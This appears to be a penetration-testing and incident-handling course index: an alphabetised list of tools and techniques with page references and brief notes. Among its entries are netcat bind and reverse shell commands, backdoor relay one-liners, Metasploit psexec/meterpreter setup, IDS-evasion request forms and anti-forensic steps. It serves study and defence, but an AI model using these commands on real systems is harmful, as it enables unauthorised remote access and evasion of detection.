Format string stack input arguments are pushed on the stack in reverse order
Format string stack view Example of adding a value (eg. 5) to an address location eg. 0xbffffac0
Fortify Source Code Analyzer 3 127 Commercial cod-analysis tool
Foundscan - McAfee's 2 119 Commercial Vulnerability scanner
Frag3 multiple parallel virtual defrag buffer
Fraggle relies on UDP packets to lunch flood against a target.smurf is with ICMP
Fragment Overlap Attack 2nd fragment lies about offset in order to overlap and replace part if first frag
Fragmentation pronlem for IDS IDS doesn’t know how the frags will be assembled, diff OS's handle this differently
similar to fragrouter but flexible, includes a lang for def specific twisted frag atk
FragRoute Diff: has the ability to route frag IP pack from remote host
tool with multiple ways to frag pkts,sits on same machine as attacker,can't route
Fyodor nmap -n -sP - o Smurf.log '209.12.*.63,127,191,255'
Gcat 5 133 C2 traffic over Gmail; bypass DLP/IDS/IPS/Firewalls
General Electric Comprehensive 4 36, 38 General info about account owner: name, phone nr, address etc
Operating Supervisor (GECOS)
Generate new file (Stego) hidden msg can gen new file.used in CGI's.Eg input text used to gen fractals
Generic Route Encapsulation Some bots can send IP packets via GRE tunnels to infected systems, to
4 73
(GRE) fw the packets as if originated from the victim
GET /./CGI-BIN/broken.chi
HTTP/1.0 /./ directory insertion - Way Nikto Avoids IDS
GET /%63%67%69%2d%6 URL encoding - Way Nikto Avoids IDS

2%/broken.cgi HTTP/1.0
GET /CGI-BIN/broken.cgi IDS signature to look for CGI exploit
HTTP/1.0 Case Sensitivity - Way Nikto avoids IDS
GET /HTTP/1.0\r\n Way Nikto Avoids IDS - Premature URL ending, include ref to CGI script in header
GET /index.htm?param=/../CGI- Fake parameter - Way Nikto avoids IDS
BIN/broken.cgi HTTP/1.0
GET /URLlonger/../CGI- Long URL formatting - Way Nikto avoids IDS
BIN/broken.cgi HTTP/1.0
GET \CGI-BIN/broken.cgi Windows delimiter,use "\" instead of "/" - Way Nikto avoids IDS
HTTP/1.0
GET%00 /CGI-BIN/broken.cgi
HTTP/1.0 NULL Method - Way Nikto avoids IDS
GET<tab>/CGI- Tab Separation - Way Nikto avoids IDS

BIN/broken.cgi<tab>HTTP/1.0
getCookie grab cookie of the current page the victim's browser is visiting
getKeyloggerData xss shell includes a keystroke logger
GetSelfHTML grabs HTML of the victim's browser current page to attacker
Getting access to systems sometimes without sys admins,notify ops before logging in,only
1 34
(preparation) experienced IH's
getpid 3 161, 168 Chack Process ID where the Meterpreter is currently running
getuid 3 159 Check current User ID
GhostRAT 5 9 App-lvl Trojan Horse Backdoor Suites
Ghostwriting 3 143 modify the assembly of an exe to bypass AV
Golden tickets (MS Kerberos5 auth tokens used as tickets, to get rid of these "tickets" reset the
4 25
Pre-Auth) Kerberos5 TGT password TWICE (it keeps a backup).
35-36, 38-44 good for Recon; cache:www.counterhack.net. Www.archive.org for

Google 2 wayback(goes wayback)
Google Hacking Database (GHDB) 2 35, 41 index of search queries (we call them dorks) used to find publicly
available information
Google Maps API 2 36 Maps is good for location images
GrammaTech 3 127 Commercial code-analysis tool - C; C++

Gratuitous ARPs 3 49, 84 Sending ARP when no one asks. You can flood switch/poison arp cache
239-241, 254, finds items matching a given condition eg. cd /etc,grep root *.find root
1 264, 266 from all files
72 -i> case-insensitive search; -B n -A n> Before and after "n";
3
grep 71-76 eg. Netstat -nap | grep 777, ps aux | grep bash
4 174, 183-188 -c>count nr of lines of output: [cmd] | grep -i -c [text]
76-78, 95, 100,
5 lsof -Pi | grep 8080
141
Group Policy Object (GPO) 4 33 Used to implement rules to users on the network
GRR Rapid Response 1 39 IR framework focused on remote live forensics, waits until system is
back online, couples with Rekall
hacking to make a political point.website tampering,manupulacting
Hacktivism 2 10 finace,remailers
Hashcat (password cracker) 4 10 Fast pass cracker, users CUDA video drivers for faster pass crak
162 hasdump:dumps passwords from memory; run hashdump: dumps
3
hashdump and run Hashdump (Meterpreter) from registry
6 51 Metasploit commands
HBGary's fastdump 5 22 memory dump tool
HEADER: ../../cgi-bin/broker.cgi Way Nikto Avoids IDS - Premature URL ending, include ref to CGI script in header
HTTP/1.0\r\n
heartbeat 1 151 interval a backdoor reconnects to get cmds from atkr
HearBleed (Powerbleed tool) 3 65 malformed SSL heartbeat reqs bleed memory out of a SSL-enabled
Apache webserver
Hidden Unix files location 5 83 /tmp,/dev,/etc, /usr/src,/usr/local/man.
Hidden Unix files location 2 5 82 name files starting with ". ",".. ","… "," "
Hiding Components in Linux 5 44 hide files,processes,network usage&events.ls,
find,du,ps,top,killall,modify crontab
type hackstuff.exe > notepad.exe:stream1.exe ; cp hackstuff.exe
Hiding Files in NTFS Windows 5 104 notepad.exe:stream1.exe
newer,by anonymous,the js can access more than one
High Orbit Ion Cannon (HOIC) 4 169 page,multithreaded,easy
Hijacking + Responder 3 79-86, 88
histogram Normal text non uniform. Encrypted text has flat hostogram; A chart showing the
. frequeency of each letter used in a file
HKEY_CURRENT_USER (HKCU) 1 69, 85
HKEY Historical usb usage(when reg query

plugged) 1 192 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
HKLM\System\CurrentControlSet
\Control\Lsa\EveryoneIncludesA 0/1; Null Sessions have no special rights / are part of Everyone group
nonymous
HKLM\System\CurrentControlSet 0/1 ; Null Sessions can/can't enumerate shares

\Control\Lsa\RestrictAnonymous
HKLM\System\CurrentControlSet
\Control\Lsa\RestrictAnonymous 0/1 ; Null Sessions can/can't enumerate names
SAM
Hop Limit (IPv6 Header bit) 2 81, 83 Hop limit for IPv6 and TTL for IPv4
Host Info (HINFO) 2 25 generated when NSLOOKUP uses set type=any
Complete 3way hand&send GET.send huge normal kinda traffic from
HTTP Flood 4 167 bots

Using pen test techniques to hunt attacker that may have used the
Hunt Teaming 3 128 same method
2 74 screenshot example ; Similar to Rubber Duckie
Human Interface Deices (HID)
3 5 USB sticks with auto-keyboards, download-run malware,steal…
Human Resources 1 170 Monitor a specific user only if written request from HR receivd
"Word mangling".substitue characters from dictionary
Hybrid Attacks 4 13, 27 words.eg.o=0,s=$,a=@
hides data in win,lin exe.msg blowfish encrypted & put in exe.no diff
Hydan in size&func
Hydan Efficiency Rate and hides 1 out of 150B,distribution of the math funcs not altered so it can
Detection be detected
5 148, 150-153 encrypts msg & hides,uses polymorphic coding tecniqs to rebuild exe.
Hydan How it works A+B = A-(-B)
rebuilds exe from ground up switching ADD and SUB.Result is same
Hydan in action size
Hydan Uses hide data,watermark,sign exe,polymorphic sig evasion(not yet)
Hydan 6 58 to hide and receive data - commandas
dont support full brute force.Dictionary support,most
Hydra Password guessing 4 8 protocols:rdp,smb.htts,ssh
82 Echo Req for a response to identify available targets
ICMP 2
83 Time Exceeded msg comes back if TTL is too small
120, 124-125,
ICMP + Tunnel 5 131 can carry Shell traffic, ICMP messages can carry Covert_TCP
ICMP Timestamp 2 82 Used for network maping via Nmap
Identification 1 48-61 Goal: gather events,analyze and determine if we have an incident
Identification Where it occurs 1 53 Network Perimeter; Host Perimeter; System lvl; Application lvl
gather intel on systems, visited sites, ftp, monitor msg boards,

Identify Insider activity 1 176 scanning,monitoring
iexplore.dll (rootkit hooking) 5 48 rootkit injects it in explorer.EXE to do API Hooking
1 232 Network config(IP,mask,MAC….) 2 interfaces: etch0 & l0
2 72 ifconfig wlan0 hw ether [MACadd] >change MAC address
ifconfig (linux) ifconfig [interface] [IP_addr] netmask [netmask] > change IP in Linux
4 176 iptables -F (disable firewall)
5 7, 43-44 Kernel locations for Rootkits
IFRAME 4 147 Buffer overflow attempt on the browser; ZAP feature
1 13 Log
3 114 Metasploit Exploitable
IIS (Web server)
4 57-58, 110, 124
Nimda exploitable; ModSecurity to deffend from SQLi
Immunity Debugger 5 20 free Win debugger; reverse engineer malware and exploits
HR makes call. obtain signed authorization. Maintain firm legal
Inappropriate web access 1 170 ground.
Inception attack tool to get access to encrypted HDDs in susp/hibernate state
action that result in harm or threat to harm system or data.detct
Incident Definition 1 11 deviation from norm; harm or attempt to harm
action or plan for dealing with intrusions,cyber-theft,dos etc.must be
Incident Handling 1 10 law compliant
Incident Handling importance plan everything,without IH legal jeopardy,PCI,industry std
inetd.conf xinetd.conf 2 104
Disable Linux services listening on ports;chkconfig is used to modify
initd 5 94-95, 99-100 Lab: Shell History

Initial Sequence Number (ISN) 5 128-30

and the ACK number are used by TCP to order packets sent/rcived
Injection hidden file is ignored & looks untampered when open.Eg.Hidden html,word header
a threat from an entity with access to your data. Employee & business
Insider threat 1 174 partners. Well-intentioned/disgruntled/unnoticed employee.
Insider threat Assesment 1 177 Identify equipment ,OS,IP,http activity,IDS monitor, Email monitor
checklist
Insider threat assesment 1 179 Review the data,summarize findings,interview suspect
checklist (3)
Insider threat Assesment 1 178 monitor called nr's,background check,work habits, after hours visit
checklist(2)
Insider threats - types casual&intentional(destructive/non-destructive)
InSSIDer 2 61-62, 77 used to descover SSID's, doesn't help if cloacked, use wellenreiter
instead
Instruction Pointer 3 97-98, 104-105 CPU uses instruction pointer to point to location in memory where
instruction is
integrity-checking 5 67, 118, 155 Tripwire,OSSEC,AIDE
Intellectual property 1 181 the primary distinction bw competitors from brand to "secret formula"
Erad:Remove infriging elements.Rec:Rebrand/rebuild.Lesson:samples,

watermarks
Intellectual property cases 1 183
Prep:Survey inte property.Iden:Look for leaks &theft.Cont:Criminal or
civil case
Intellectual property crown 1 182 patents,copyrights,trademarks/servicemarks,trade secrets
jewels
Internet Explorer 3 62 SSL warning msg - untrusted CA used
Internet Key Exchange (IKE) 4 26 CAIN crackable
66, 68-69,
Internet Replay Chat (IRC) 4 164,168 Bot communication via TCP 6667
inurl: "ViewerFrame?Mode=" 2 37, 42 to search web accessibility devices-web cameras
Invisible Secrets 5 148 Stego tool- Hides data in banner ads that appear on websites
IP address spoofing used fool sys that filter based on IP,acl's,FW's,trust relationships. also in DOS
IP address spoofing defense Pre:unpredictable sqn nr,careful with trust rel,don’t aut with IP's,anti-spoof,no src
IP address spoofing defense 2 Iden:anti-spoof filters and IDS logs.Con:filters,look for processes
IP address spoofing Flavor 1- change IP to anything you want- ifconfig/netsh interface IP set address
Change address
IP address spoofing Flavor 2-Hack
ISNs are possibly predictable.1 at 10000.take the other out of service DOS
Unix Trust
IP address spoofing Flavor 2-TCP
Seq Nr guessing atker can take over a system of guessing TCP sequence number.Trust Relationship
IP address spoofing with Sqn nr DOS original sys so that it wont send RST,keep guessing ISN. 1 way communicatn
guessing
IP Fragmentation Analysis frag 21223:1480@0+
IP Fragmentation Defense Pre:Reassmeble before decission,FW,update IDS/IPS,HIPS/HIDS.Ide:IDS sig,IPS
IP Identification field 5 128
Covert_TCP can send info with ASCII data in IP ID, TCP' ISN & Ack SN
IP packet header 2 81 IPv4 and IPv6 header
IP personality Tool that can make a linux machine look like any other type of system
1 203 iptables -F (disable firewall)
2 151 Sudo ifconfig eth0 10.10.75.1 netmask 255.255.0.0
iptables
3 28 ifconfig eth0 10.10.75.1/16
6 8 Disable firewalls Linux (+Windows)

IPv4 Header 2 MF,DF,IP ID,Fragment offset, type of service=06

IRC to control Bots (TCP 6667) 4 68 Bots can be controlled with IRC; one-to-many comm
ISP Coordination 1 109 can help Id,contain,recover from floods,botnet,worm/vir spam
undermine auto update proceess of a software.java
ISR-Evilgradee 2 12 plugins,winamp,MAC OSX etc
ISS & Retina Vulnerability scanners for networks
Jikto (runs browser scripts) 4 119 performs a Nikto scan of internal websites using XSS functionality
Jizz DNS Cash poisoning tool
bg, fg, jobs. Use & after cmd to run str8 in background. fg
job control (linux) 1 228 1=foreground 1st job
1. Single Crack mode; 2. Wordlist mode (Dictionary and hybrid); 3.
John Cracking mode 4 38 Incremental/Bruteforce mode; 4. External mode
3 91-92
lin: requires both etc/shadow and etc/passwd-> combined #unshadow
John The Ripper (crossplatform) 4 10, 35-41, 43- ect/passwd /etc/shadow > combined
47
Shadow file format; input&output(john.pot); PAM; Lab;
6 52 short info
john.pot 4 39 stores cracked passes. Must be removed for audit
jolt (DoS tool) 4 161 send malformed packets tp crash remote systems.
Jsteg 5 148 Hides data in JPEG images using DCT
jump bag 1 40-47
Jump Bag(preparation) binary img creation software(dd,netcat,safeback,forensic soft(Sleuth,Encase,xways)
Jump Bag-Additional items phonebook,cell phone extra batteries,plastic bags,notebooks,desicants etc
Jump Bag-Additional items 2 jumpers,flashlight,screwdrivers, tweezers,business cards etc
Jump Bag-Hardware USB token RAM 8gb,ext HD,eth tap,patch cables,laptop with multiple OS,ssd's,vm's
Jump Bag-investigative tools SIFT:vmware appliance that includes sleuth kit,log2timeline,wireshark,volatility etc
Kansa(detection tool) 1 140-144 Tool written in Powershell; create stacked analysis of installed
software in environment- LONG TAIL; focus on interested procses; Uses
powershell to pull info across many hosts and has good statistical tools
listens for client probe requests,pretends to be the SSID,exploits with
metasploit
Karmetasploit 2 69-71
fake services:dhcp,dns,pop3,web server.Pretend to be SMB server &
gets ur pass
ring 0&3 in x86 archi.user proc-->sys lib-->CPU interupt-->sys call
Kernel 5 51 table-->Kern code
Kernel File on Hard drive overwrite kernel file:vmlinuz and Win32.sys &
5 57
Modification ntoskrnl.exe(windows).bypass ntldr
Kernel Loadable Module & used in linux to add new HW/features.In windows=drivers.create
5 55
Device Drivers malicous driver
1 258 chkrootkit looks for anomalies on system made by user/kernel m
Kernel-mode rootkit 7, 50, 52-56, 58,
5 60-61, 64-65,
67-69, 82
Config Lockdown:Prevent from getting root,Harden sys,use good
Kernel Mode Rootkit Defenses 5 64 security template
pre:config lockdown,protect syscall table
Kernel Mode Rootkit Defenses2 Protect SysCall Table:use systrace(track sys calls)HIPS,few vers don't let sys table exp
hides processes,files,network usuage(tcp&udp),promisc

Kernel Mode Rootkits 5 52 mode.Execution redirection
Ide:Linux:chkrootkit,rootkithunter,OSSEC. Win:Sofos,McAfee,Rootkit
Kernel Mode Rootkits Defenses 2 5 65-66 Revealer

con:Analyze other changes made.Era:Re-image,patch,change

Kernel Mode Rootkits Defenses 3 5 69 pass.Rec:Monitor
Alter sys call table->evil wrapper code SYS_execve->another prog or
Kernel Modification-altering 5 53 legit SYS_execve
/dev/kmem in linux is file that holds kernel mem space.Wind System
Kernel Modification in Memory 5 56 mem map
Kernel - Run Programs directly in KML tool. jump from 3 to 0.alter sys call table and sys call code from process
Kernel mode
Kernel Vritualization 5 58 imprison users in a VM withouth their knowledge
Keystroke logger 3 54, 118 MitMf uses module JSkeylogger ; Metasploit feature
kill [pid],killall [process_name], edit inetd,disable=yes in xinetd,
kill / Disable linux services 2 104 chkconfig [svc_name] off
tskmgr,wmic process [pid] delete,sc stop [service],sc config [service]
kill / Disable windows services 2 102 starts disable
kill multiple processes 4 178 wmic process where name="calc.exe" delete
1 260, 262, 266 #killall [Process_name];
4 184, 188 killall -9 [process_name]; -9 kills immediately, no comment
killall
5 44, 87, 138 kill -9 bash (kill all bashshells so it cannot write the most recent shell
history
looks for SSID's in messages across the network.sniff traffic, cloaking
2 61, 63
Kismet cant stop it
5 163-164 Linux passively discover APs. Sniff traffic, cloaking cant stop it
Knocked - Non Promisc Sniffing linux tool.supports more flags than Cdoor,FIN,ACKREST to wake up backdoor
Backdoor
KIS (Kernel Intrusion System) Communicates via UDP on random ports using a sniffer
Knark listen on a port
3 4, 6 bypass auth ctrls by highjacking the passw lib to accept any passw;
Kon-boot (USB boot) DEF: Pass protect BIOS & disable USB boot
4 29 non-admin access
L0phtCrack Password Cracking for Windows
LADS 5 106, 111 Tool for finding alternate data streams in NTFS
land 4 161 DoS tool
3 80,157 RESPONDER can downgrade auth to LANMAN
LANMAN (weak pass hash algor)
16-21, 28, 47 pass
Win NT/2000/XP/2003 14 char or less is paded to 14 and made UPPERcase then split in 2
7-byte strings as DES; monk:1 monk:2
4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ->
LANMAN auth disable 32 Edit,Add key, "NoLMHash", OK, disabled after pass res
Lanturtle + Responder 3 4, 6 mitigation against these attacks is to disable LLMR
Last In First Out(LIFO) 3 99 Push things on top of stack; pop things out from top of stack
lastlog (/var/log/lastlog) 5 89-90 Login name,port,lastlog time for each user
Law Enforcement (LE) 1 97, 183, Ask legal team before anything related to Law enforcement; they must
sign when taking evidence; Criminal case workers
Layer Four Traceroute (LFT) send pkts through a pkt filter device to determine which ports are open
Least Significant Bit (LSB) 5 154 hide from human eye; discreet data hiding in Stego
Legal system Regulatory, Criminal law, Civil law(Compensatory, punitive and Statutory)
2 wks of resuming prod. Executive summary . Keep short and prof
114-115, 128- document what happened, improve; Blame
Lessons Learned 1 130
processes, technology, improved incident handl capabilities
less /dev or ls /dev | less 1 221 viewing output (less)
Lightweight Extensible 2 60, 64 weak WiFi protection (WEP also)
Authentication Protocol (LEAP)
Link-Local Multicast Name
Resolution (LLMNR) 3 6, 50-51, 84 bad name-resolution system (if no DNS), easy to crack, Def:Disable

link:www.[target_company].com 2 29, 37 search on Google for all sites that link to the target
root,bin,sbin,dev,etc(passwd,shadow),home,lib,mnt,proc,tmp,usr(bin,
Linux file system structure 1 213 sbin,man),var
Pass policy,guard pass file,strong pass,use shadow pass,use
Linux Password Cracking Defense 4 40 PAM,token,kerberos
colon-separated(loginname,Encrypted pass,UID nr,GID,GECOS
Linux Password File Format 4 36 info,home,shell
Linux Password Shadow File login name,encry_pass,date of last change,min age,max age,warning
4 37
Format days…
Symmetric-key EnCryption - made to replace DES. Telnet over ICMP.Can hide as DNS
LOKI block cipher traffic using UDP port 53. Carry Shell between linux client and server
using ICMP Echo and Reply
Log Editing in Windows 5 114 main event log files: System, Security, App
long-tail analysis (Kansa) 1 140 create stacked analysis of installed software in environment
Low Orbit Ion Cannon (LOIC) 4 168-169 tool to lunch various floods.win,linux,droid,javascript for browser
-a(lists all files including hidden files); -d(list all with */); -l(long listing
148, 155, 215, format,perm,link..); -r(ists in reverse order); -s(lists file size); -t(sorts
1
ls (LS) 217, 221, 262 list by time/date) -> eg. -lrt , - la, ls /tmp, ls /dev | less, which ls, ls
-a /tmp
5 44 Rootkit can hide files by changing ls
16, 49, 50, 51, Interface-manage loc sec,dom auth,ADproc
LSASS (Local Security Authority 4 53, 59
Subsystem Service)
5 33
234,247,250,25 -i(all network connections); -p [pid](all files and ports used by running
1
lsof (list open fies) 2, 260,262-263 process);+L1(unlinked files);-P(shows ports not names)
5 100 lsof -Pi | grep 8080

lsof or netstat linux 1 252 netstat -nap-shows listening ports/ lsof -i(list all net connections) -p(flag
by typing)
lusrmgr.msc 1 71, 88 users ang groups, check unusual accounts
MAC address 3 48 MAC size is 48 bytes;00:50:56/00:0c:29the first 3 bytes of MAC is
VMWare
MAC lab 3 70-77 MAC tables lab
MaCof floods switch with bogus MAC so it fails open and acts like a hub. Manipulate MAC to
. physical plug mapping
using a piece of info eg,Domain name it applies the concepts of
Maltego 2 46-48 transforms.
Maltego Defenses keep records up to date,conduct your own recon
Maltego Transforms DomainToPhone_whois,PersonToPerson_PGP,DomainToMXrecord_DNS
Malware Domain List (MDL) 1 134 site with known bad actors to compare to DNS cache
App level,User-Mode Rtkits,Kernel Rtkit,Boot
Malware layers 5 7 Sector,Firmware,Malware MicroCode
man & info (detailed usage info 1 242-243 man ls, info ls, man -k network (lookup by keyword)
for commands)
51, 53-54, 68, supports ARP cache poisoning &multiple other injection/TCP stream
Man-in-the-Middle Framework 3 modification atks; backdoor EXEs in transit(FilePwn); ScreenShotter-
(MitMf) 83 invokes HTML5 Canvas>screenshots browser; SSLSTRIP+
Management Support Monthly report, show evidence of damge,show how other have been
1 29
(preparation) hacked
Mantech Responder 5 26 Analyze memory dumps;Compares malware with known ones
MasScan 2 97 tool to scan very large networks with thousands of hosts, quickly

MD4 4 19 NT hash stored in SAM

1 167, 251 Good idea to hash logs because they are perishable. MD5sum
MD5 4 20 $1$ indicates that the pass is hashed with MD5 (Linux)
5 155 Help identify Stego
1 43, 110 create hash of original and your image for investigation
md5deep
2 13 calculates md5, sha1, sha256, Tiger, Whirlpool
MemoryDD from memoryze, fastdump, win32dd, Responder by
Memory Analysis Tools 5 22 mantect,Volatility
MemoryDD.bat 5 22 can generate memory dump
Memoryze 5 22 capture and analyze mem dumps on Win
111-129, 137-
138, 152-153,
155-159, 164- Exploit collection,Payload Collection,Auxiliary Modules and Post
3 Modules
Metasploit 166, 168, 170-
173
4 63, 76-77, 86 cd /home/tool/framework-x.x.x - navigate to metasploit
6 51 Commands
Metasploit aditional Features multi session,in-mem process migration,disable

3 118
. keyb&mouse,keylogger,sniffing,Encode for IDS evasion,Pivot,priv escal
payloads,encoder/decoders,NOP sled,wrapper-shellcode
Metasploit Features-Routines 3 119 creation,msfelfscan&msfpescan
metasploit launch and cd /home…framework4.9.0,source /opt/useruby193.sh,./msfconsole,show exploits
msfconsole 3 153 #ifconfig eth0 10.10.75.1/16; #msfconsole -q; show exploits
Metasploit multi/handler waits for connection:use exploit/multi/handler,set PAYLOAD..,set LHOST,exploit
Metasploit Payloads Payloads can be exported in diff formats,eg of payloads:bind shell,
3 115
. reverse shell,VNC,inject DLL,create local admin user
Metasploit Payloads -
Meterpreter 1.doesn't create a process to run shell,runs it inside exploited process; 2.doesn't touch the
. HDD,gives access by manipulating mem; 3.its own cmds, no need for executables on target;
4.dynamicaly load new modules,changing its function while in the memmory of the
.book3 exploited proc. Ability to load and interact with DLLs in real time,after exploitation occurred
.page 116
use exploit/wind../smb/psexec;set PAYLOAD
metasploit psexec 3 155, 156 win../meterpreter/reverse_tcp
metasploit search search type:exploit psexec, info exploit/windows/smb/psexec
Metasploit User Interface Select Exploit,select target,select payload or set cmd to execute,set
. 3 113 options & launch
Meterpreter 5 116 clearev , clears app,sec and sys event logs.no edit tool yet
Meterpreter - get a shell 3 163 run "shell" command to get cmd. Test using net user. Exit
uses TLS to encrypt communication; displays sys info,interact with file
Meterpreter Features 3 103, 117 sys,network and processes on target
Meterpreter Session 3 159 background,sessions -l,sessions -i [session_nr],
management
Microsoft Sysinternals 1 77, 126 Process minitor, psexec
migrate 3 164, 167-169 migrate [Pid], getpid ; migrate [PIDofCalc.exe](meterpreter)
Mimikatz 4 51 extracts/views clear-text passwords from LSASS
more command to view the contents of a stream (location and name of stream needed)
mount cdrom cd /mnt/cdrom, mount cdrom, mount /dev/cdrom, mount /mnt/cdrom
MP3Stego 5 148 hides data in .mpeg files
MS-Kerberos5 Pre-Auth 4 25 Used for auth across network
3 103, 119 scan for exe's and DLL's with vuln code (POP+POP+RETURN)
Msfelfscan & Msfpescan
5 56 can find libreries from unusual locations(servicepack/language)
3 137,138
Msfvenom

Msfvenom 4 77 converts a payload into a stand alone file

5 18
MSVenom 3 137, 147 -f exe-ony
msyslog 5 118 cryptographic integrity check of log files & remote sys logging
MySQL 4 129-130, 137 SQLi lab
namechk.com -recon site 2 30 checks names on over 100 social network sites
nbstat -s 1 65 systems connected to machine listed by IP;NetBIOS over TCP/IP
nc 6 55 Netcat example commands
nc -l -p 55555 -e /bin/bash 2 open a backdoor listener on port 55555
nc [ListenerIP] [port] -e /bin/sh 3 21 push a shell session from a client to the server
ncpa.cpl 1 network interface adapter show (Windows)
ncat 3 11 variation of Nmap project(SSL,nice&easy features, 100 simu con)
119-123, 126- vulnerability scanning (commercial basis), can attempt to pull
Nessus (Linux) 2 127, 132, 135 /etc/passwd file via TFTP
Nessus Architecture client-server.Server has plugins.HTML based GUI on client.HTTPS TCP 8834 to server
Nessus Platform Support Regular OS,regular browsers,Dangerous pluggin run attacks causing probs on sys
Nessus Plug-ins plugins for each attack,abt 100k, auto update every 24hrs, write ur own plugins
Nessus Startup & stop 2 sudo systemctl start nessusd. Firefox https://localhost:8834 &. systemctl stop nessusd
Nessus Attack Scripting Language 2 123 Plug-ins can be writen in NASL
(NASL)
net (Win commands) 6 53 Windows NET commands
net localgroup [group_name] 1 71, 88 list members of a group (administrators)
1 65 see SMB connections that ARE OPENED to system (inbound)
net session 146, 156-157,
2 162 \\[Ipaddress] /del.To drop an inbound SMB session
\\ [TargetIP]. Establish a SMB Session-Win
\\ [TargetIP] "" /u:"". connect as no user(anonymous or NULL SMB
session); blank username/password
137-140, 146,
2 \\ [TargetIP]/[ShareName] [pass] /u: [User]. SMB session connect as
net use (establish a session) 162
another user or to a specific Share
\\[Ipaddress] /del. To drop an outbound SMB session
net use * /del .to delete all outbound SMB sessions
4 50 see which SMB session YOU HAVE to OTHER systems (outbound)
1 65 net view \\127.0.0.1 -> file shares from local host
list of shares
net view
2 139-140, 152 \\[TargetIPaddress]. Once established a SMB session you can get a list
of shares
NetBIOS Name Service (NBT-NS) 3 50 If DNS or LLMNR are not available then NBT-NS is used
TCP 139
11-26, 28-43 reads and writes data acrros network.

3
Netcat Variations:Ncat,dnscat,socat,cryptcat,linkcat, more
4 181, 187-188 use to loop: While - Linux; for - Windows
standard scan, -z:minimal data,not stealthy like nmap,scripts for vuln
Netcat as a scanner 3 17 scan
Netcat Backdoors 3 19 nc -l -p [port] -e /bin/sh; nc -l -p [port] -e cmd.exe
stdin->client initiates connect->stdout.Netcat msgs are sent to stdError
Netcat Client mode 3 12 not stdout
stdin->waits for connect->stdout.diff with client is that it runs with "-l"
Netcat Listening mode 3 13 list mode and waits for a connection
Netcat Cllent-Client Relay The relay:nc 127.0.0.1 4444 0<backpipe | nc 127.0.0.1 2222 1>backpipe

"-l=listen,L=listen harder,-u:UDP,-p=src port,-e=exe,-z:zero I/O,-

Netcat command switches 3 14 wN:wait N secs"; >:dump output to file; <:dump input from file; |:Pipe
output of 1st program into 2nd program
Lis-Cli:on Lis: nc -l -p < [file].on Cli: nc [LisIP] [port] > [file] ; Cli-
Netcat Data Transfer 3 16 Lis:on Lis: nc -l -p > [file].on Cli: nc [LisIP] [port] < [file]
know your sys,close all unused ports,apply sys patches,stop unus
Netcat Defense 3 26 proc,architecht
while [ 1 ]; do echo "started"; nc -l -p [port] -e /bin/bash; done
Netcat Persistent Backdoors 3 20 windows:-L=persisten listening,linux:cronjob,while loop sh script run
with nohup
Nc -l -p [in_port] | nc [target_serv] [Out_port] ; redirect through ports
Netcat Relays 3 22 allowd by FW.
mknod backpipe p ; nc-l -p 11111 0<backpipe | nc next_hop 54321
Netcat Relays FIFO Method 3 23 1>backpipe
Netcat Relays for Backdoor w/o
3 25 mknod backpipe p ; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
-e
Lis: nc -l-p [port]. Cli: nc [LisenerIP] [port] -e /bin/sh. Type your cmds
Netcat Reverse Shell Backdoor 3 21 on list
Data transfer,port scanning,making connections to open
Netcat uses 3 15 ports,backdoors,relays
Netcat is faster, supports UDP,clean connection drop.Telnet
Netcat VS Telnet for connections 3 18 err/comment msgs are sent to sdout
NetNanny- style filters 1 172 name for the filter style of web proxy (websense, Blue Coat, etc)
1 66, 92, 203
netsh 2 73-74, 151
3 28, 30
netsh wlan 2 73-74
55-56, 66, 81,

1 208, 212, 222, -nap, -nap | less. Network usage
229, 234-35,
239, 241, 252
-na>look for listeners; -nao>show PID as well; -nab>shows exe and
DLLs used; -o>list ports
2 101, 103
-nat(t for TCP) | grep -l listen > counting half-open connections in
netstat Linux
164-465, 169,
3 173
179-180, 182,
4 185-188 -na | find /I "listenening" > find listening ports on Win
23, 25, 33, 44,
47-48, 63, 76,
5 96, 101
used to discover SSID's, doesn't help if cloaked, use wellenreiter
2 61 instead. War driving tool for Win. 802.11 a/b/g. To determine SSID
NetStumbler
sending probe requests
4 24
Network Address Translation 1 36, 202
(NAT)
Network Forensics unusual netwk pattern,correlate data and logs,NIPS
5 68
Network Forensics Tools Netwitness, FireEye, Sourefire,TippingPoint,ForeScout etc
Prep:disable incoming ICMP msgs,disable outgoing Time exceeded
Network mapping defense 1 2 85 msgs.Ide:IDS
Network mapping defense 1 2 86 cont:temporarily block source address on firewall

network usage (linux) 1 228 netstat -nap,netstat -nap | less

Niksum 3 can reconstitute an entire browsing session
web/cgi scanner,scans > 3k dangerous cgi/asp..scripts and related
Nikto 4 119, 134 material.Wikto
Nikto Authenticatn and commu supports web auth,can guess passwds,stores cookies,support proxy&SSL
features
Nikto Cookie View Navigate to folder. Perl ./nikto.pl -Single.hostname,Url,Data:Cookie: user=2
Nikto features auto update itself,determine OK/NOT FOUND,finds CGI directories,robots.txt,IDS ev
Nikto IDS Evasion morphs requests so it doesn't match any sigs.9 run at application layer,1 at L4
Nikto IDS Evasion - Techniques URL encoding, /./ directory insertion, premature URL ending, Long URL
Nikto IDS Evasion - Techniques 2 Fake Parameter,TAB separation,Case Sensitivity,Windows Delimeter
Nikto IDS Evasion - Techniques 3 NULL method, Session splicing (this is the L4 method)
Nikto password attack 2 167 can launch pass guessing attack the network; uses a directory file
1 96
Nimda
4 57-58 Mullti-exploit & Multiplatform
1 54, 56, 121
2 80,82-84,93-96, (nmap -A)all details, pulls banners, OS iden, traceroute,etc ; 106

Nmap lab
106-109, 112
Nmap 3 11, 17
4 104
5 80,162,164-168
6 16, 31-32, 48
Nmap -A 2 108 all details,pulls banner,OS iden, traceroute,etc
nmap -n -sP -o Smurf.log to look for potential Smurf Amplifiers
209.12.*.63,127,191,255'
nmap -Source ports for scanning UDP 53, TCP 53 (DNS zone transfer), TCP 80 (most popular), TCP 443
useful for mapping not scanning,won't get past a stateful FW,can't tell
Nmap Ack Scanning 2 94 if port is open
Nmap Identifyiny addresses- Sends 4 packets to addresses.ICMP echo,TCY SYN 443,TCP ACK 80,ICMP
2 82
Sweeping timestamp
sending various packet types (eg SYN,FIN,URG,PUSH) and measuring
Nmap OS fingerprinting 2 95 response
new methods:sqn nr GCD,window size,TCP timestamp,TTL
Nmap OS fingerprinting 2nd Gen 2 96 guess,DF,Congestion. If no recon fingerprint, nmap giver instruct to
send it to insecure.org
gives reason why it believes a port is open. Eg. nmap --reason
nmap --reason 2 107 127.0.0.1
